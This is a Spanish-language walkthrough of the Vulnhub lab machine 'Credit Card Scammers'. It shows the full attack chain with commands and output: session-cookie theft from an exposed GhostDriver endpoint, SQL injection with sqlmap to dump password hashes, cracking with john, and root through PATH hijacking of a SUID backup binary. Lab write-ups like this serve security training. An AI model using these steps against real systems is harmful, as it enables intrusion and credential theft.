__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 
[VLN] Credit Card Scammers
Hoy vamos a hackear la maquina de Vulnhub llamada
Credit Card Scammers. Podeis descargarla desde el siguiente enlace: 
https://www.vulnhub.com/entry/credit-card-scammers-1,479/

Video


Enumeration
Empezamos con un nmap para ver que puertos 
tiene abiertos.


sml@Cassandra:~$ nmap -A -p- 192.168.1.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 12:54 CEST
Nmap scan report for ppeshop.home (192.168.1.52)
Host is up (0.0012s latency).
Not shown: 65531 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 8d:0a:3a:42:5f:92:47:69:33:59:b3:77:53:3c:be:73 (RSA)
|   256 ab:3d:26:3b:d9:02:50:a4:49:c0:bf:13:75:dc:a5:73 (ECDSA)
|_  256 fb:6a:7e:1b:05:f9:d1:ef:be:dd:ff:39:ed:f5:f5:63 (ED25519)
80/tcp   open   http       Apache httpd 2.4.37 ((centos))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
|_http-title: Your PPE Supplier
443/tcp  closed https
9090/tcp closed zeus-admin

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 197.03 seconds


Miramos si el puerto 80 tiene algo mas interesante para
mostrarnos...


sml@Cassandra:~$ gobuster dir -u http://192.168.1.52 -w 
/usr/share/wordlists/dirb/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.52
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/05/13 13:04:14 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.txt (Status: 403)
/LICENSE (Status: 200)
/_admin (Status: 301)
/buynow.php (Status: 200)
/cgi-bin/ (Status: 403)
/class (Status: 301)
/css (Status: 301)
/img (Status: 301)
/noindex (Status: 301)
/settings (Status: 301)
/vendor (Status: 301)
===============================================================
2020/05/13 13:04:24 Finished
===============================================================


Vemos que tiene el directorio /_admin, al cual si entramos
en http://192.168.1.52/_admin/dist nos lleva a una pantalla
de login....

Por otro lado, buscamos mas informacion en el puerto 443.


sml@Cassandra:~$ gobuster dir -u http://192.168.1.52:443 -w 
/usr/share/wordlists/dirb/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.52
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/05/13 13:04:14 Starting gobuster
===============================================================
/sessions (Status: 200)
/shutdown (Status: 200)

===============================================================
2020/05/13 13:04:24 Finished
===============================================================


Vemos que hay un directorio llamado /sessions.
Si entramos, podemos ver que es algo relacionado con phantomjs
y ghostdriver....
Buscando mas informacion encontramos los comandos integrados en 
ghostdriver:
https://docs.google.com/spreadsheets/d/17PKHWWhOgEFB8Vznju_bB6p9duguo-2NqL9qBgUQ
iYE/edit#gid=0

Exploitation
Despues de ver los comandos accedemos a:
http://192.168.1.52:443/sessions

Podemos ver la sesion-id, la copiamos y vamos a:
http://192.168.1.52:443/session/022189e0-95f5-11ea-b7bf-5d93144ae786/cookie

Copiamos el "value". 
Vamos a http://192.168.1.52/_admin/dist/ y con el cookie manager 
ponemos el "value" que hemos copiado anteriormente, de ese
modo al recargar la pagina ya estamos logueados...

Vamos a "Database Admin -> Execute" y capturamos la request
con Burp Suite.
La guardamos como un fichero (hackme.txt).

Ejecutamos sqlmap y vemos que el comando command es vulnerable.
Miramos las BBDD que hay.


sml@Cassandra:~$ sqlmap -r h --dbs
[18:20:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:20:06] [INFO] fetching database names
[18:20:06] [INFO] fetching number of databases
[18:20:06] [INFO] resumed: 2
[18:20:06] [INFO] resumed: information_schema
[18:20:06] [INFO] resumed: orders
available databases [2]:
[*] information_schema
[*] orders


Miramos las tablas.


sml@Cassandra:~$ sqlmap -r hackme.txt --dbs -D orders --tables
[18:20:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:20:10] [INFO] fetching database names
[18:20:10] [INFO] fetching number of databases
[18:20:10] [INFO] resumed: 2
[18:20:10] [INFO] resumed: information_schema
[18:20:10] [INFO] resumed: orders
available databases [2]:
[*] information_schema
[*] orders
[18:20:10] [INFO] fetching tables for database: 'orders'
[18:20:10] [INFO] fetching number of tables for database 'orders'
[18:20:10] [INFO] resumed: 2
[18:20:10] [INFO] resumed: orders
[18:20:10] [INFO] resumed: users
Database: orders
[2 tables]
+--------+
| orders |
| users  |
+--------+


Por ultimo, hacemos un dump de la tabla "users".

sml@Cassandra:~$ sqlmap -r hackme.txt --dump -D orders -T users
Database: orders
Table: users
[2 entries]
+--------+--------------+-------------------------------------------------------
-------+
| userID | userName     | password                                              
       |
+--------+--------------+-------------------------------------------------------
-------+
| 1      | admin        | 
$2y$1X$A4jqwtWB73.TAMIeplx0T.5oG/mnHR1qTDa8cmtTIvW3ZTjdSjdjC |
| 2      | m0n3y6r4bb3r | 
$2y$12$EX/FDsztTMwftzPRyY8gFuM7ZjAphQRZs88qpZpmboRogOAOYXowC |
+--------+--------------+-------------------------------------------------------
-------+


Copiamos el password del usuario m0n3y6r4bb3r a un fichero
y lo crackeamos usando john y el diccionario rockyou.txt.


sml@Cassandra:~$ nano tocrack.txt
sml@Cassandra:~$ sudo /usr/sbin/john tocrack.txt 
--wordlist=/home/sml/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delta1           (?)
1g 0:00:07:12 DONE (2020-05-17 19:07) 0.002313g/s 44.64p/s 44.64c/s 44.64C/s 
greta..blakey
Use the "--show" option to display all of the cracked passwords reliably
Session completed


Obtenemos la password.
Nos logueamos con moneygrabber, es decir m0n3y6r4bb3r pero
sustituyendo los numeros por letras.

Low Shell


sml@Cassandra:~$ ssh moneygrabber@192.168.1.52
MONEY MAKER.

PLEASE LOGIN.
moneygrabber@192.168.1.52's password: 
Last login: Thu May 14 21:43:28 2020 from 192.168.1.148
[moneygrabber@ppeshop ~]$


Exploramos el sistema y miramos si hay algo interesante.


[moneygrabber@ppeshop ~]$ find / -perm -4000 2>/dev/null
--SNIP--
/usr/bin/backup
--SNIP--


Vemos que esta el fichero /usr/bin/backup con SUID.
Al ejecutarlo, ejecuta tar/mysql.tar, asi que creamos
un enlace simbolico de bash con los nombres tar
y mysql.tar, exportamos el PATH para que apunte a nuestros
enlaces y ejecutamos :)

Privilege Escalation


[moneygrabber@ppeshop ~]$ mkdir bin
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/tar
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/mysql
[moneygrabber@ppeshop ~]$ ln -s /bin/bash bin/mysql.tar
[moneygrabber@ppeshop ~]$ export PATH=/home/moneygrabber/bin:$PATH
[moneygrabber@ppeshop ~]$ /usr/bin/backup
[root@ppeshop bin]# id
uid=0(root) gid=1000(moneygrabber) groups=1000(moneygrabber)
[root@ppeshop bin]# cd /root
[root@ppeshop root]# ls
anaconda-ks.cfg  flag3.txt  ghostdriver.log
[root@ppeshop root]# cat flag3.txt 
y2zmGeGjrA4dbDj4wBWr


End
Y con esto ya seriamos root de la maquina :)